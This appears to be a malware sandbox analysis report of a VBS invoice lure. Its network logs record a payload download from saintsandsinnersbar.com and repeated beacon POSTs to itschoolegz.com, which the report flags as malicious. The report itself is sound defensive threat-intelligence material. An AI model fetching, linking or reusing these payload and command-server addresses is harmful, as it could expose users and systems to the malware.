SHA256:  ––
2856
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa2856.37052\SignIQ Pty Ltd invoice 127.vbs
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
13
TCP/UDP connections
12
DNS requests
5
Threats
0

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
–– –– HEAD 200 94.23.14.191:443 https://saintsandsinnersbar.com/duplicate/answear.xls FR
––
––
unknown
–– –– GET 200 94.23.14.191:443 https://saintsandsinnersbar.com/duplicate/answear.xls FR
executable
unknown
2912 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious
1628 dVjiJafHlc.exe POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious
1628 dVjiJafHlc.exe POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious
2136 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin US
binary
whitelisted
2136 iexplore.exe GET 200 152.199.19.161:443 https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml US
xml
whitelisted
2136 iexplore.exe GET 304 152.199.19.161:443 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml US
––
––
whitelisted
2136 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin US
––
––
whitelisted
2800 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious
2752 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious
1892 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious
1904 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU
text
html
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
–– –– 94.23.14.191:443 OVH SAS FR unknown
2912 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
1628 dVjiJafHlc.exe 46.17.45.108:443 LLC Baxet RU malicious
2136 iexplore.exe 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2800 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
2752 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
1892 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
1904 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious

DNS requests

Domain IP Reputation
teredo.ipv6.microsoft.com No response unknown
saintsandsinnersbar.com 94.23.14.191
unknown
itschoolegz.com 46.17.45.108
malicious
r20swj13mr.microsoft.com 152.199.19.161
whitelisted
iecvlist.microsoft.com 152.199.19.161
whitelisted

Threats

No threats detected.

Debug output strings

Process Message
–– base\diagnosis\diagtrack\engine\heartbeat.cpp(199)\diagtrack.dll!000007FEFA4EDA84: (caller: 000007FEFA4ED257) ReturnHr[PreRelease](60) tid(514) 80070510 The requested file operation failed because the storage policy blocks that type of file. For more information, contact your system administrator.
–– base\diagnosis\diagtrack\engine\heartbeat.cpp(199)\diagtrack.dll!000007FEFA4EDA84: (caller: 000007FEFA4ED257) ReturnHr[PreRelease](60) tid(514) 80070510 The requested file operation failed because the storage policy blocks that type of file. For more information, contact your system administrator.